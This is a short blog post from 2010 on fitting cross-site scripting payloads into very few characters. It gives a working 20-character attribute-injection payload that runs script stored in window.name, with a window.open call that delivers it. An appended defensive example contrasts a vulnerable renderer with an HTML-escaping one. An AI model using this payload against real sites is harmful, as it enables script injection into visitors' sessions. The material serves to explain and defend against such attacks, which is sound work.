Wednesday, January 13, 2010

XSS and Ultra Short Urls II

Since writing the first post about my efforts to load external JavaScript in under 30 characters, I've learned several new tricks for referencing "external" JavaScript. The shortest one is this (20 characters):
"onfocus="eval(name)
This only works if the window's name property has been set to hold your "external" JavaScript:
window.open('http://some.site.com/with/xss/vulns?input="onfocus="eval(name)', "alert('xss')")
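Seen from the defending side, a 20-character payload means an input length cap will not stop this; the fix is to encode the value before it is written into the attribute. The following is an added example, not code from the original post: the render functions and the simplified attribute lister are hypothetical stand-ins for a reflecting page and the browser's tokenizer, and the only payload used is the one quoted above.

```javascript
// Added example: constructed reflection sink, not code from the original post.
// PAYLOAD is the 20-character string quoted in the post.
const PAYLOAD = '"onfocus="eval(name)';

// Vulnerable (hypothetical page): reflects the parameter into a
// double-quoted attribute verbatim, so a quote in the input ends the value.
function renderVulnerable(input) {
  return '<input type="text" name="q" value="' + input + '">';
}

// Hardened: HTML-encode every character that can end or restructure
// the attribute before it is concatenated into markup.
function escapeAttr(s) {
  const map = { '&': '&amp;', '"': '&quot;', "'": '&#39;', '<': '&lt;', '>': '&gt;' };
  return String(s).replace(/[&"'<>]/g, (c) => map[c]);
}

function renderHardened(input) {
  return '<input type="text" name="q" value="' + escapeAttr(input) + '">';
}

// Simplified attribute-name lister for one tag with double-quoted values.
// It is a stand-in for the browser's tokenizer, sufficient for this markup.
function attributeNames(tag) {
  const names = [];
  const re = /([^\s"'<>\/=]+)\s*=\s*"([^"]*)"/g;
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// True when the rendered tag carries any on* event-handler attribute.
function hasEventHandler(tag) {
  return attributeNames(tag).some((n) => n.startsWith('on'));
}

// A 20-character cap on the parameter would still let the payload through.
console.log('payload length:', PAYLOAD.length);
console.log('vulnerable:', attributeNames(renderVulnerable(PAYLOAD)));
console.log('hardened:  ', attributeNames(renderHardened(PAYLOAD)));
```

With the vulnerable renderer the tag gains an onfocus attribute; with the hardened one the same input stays inside value as inert text.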
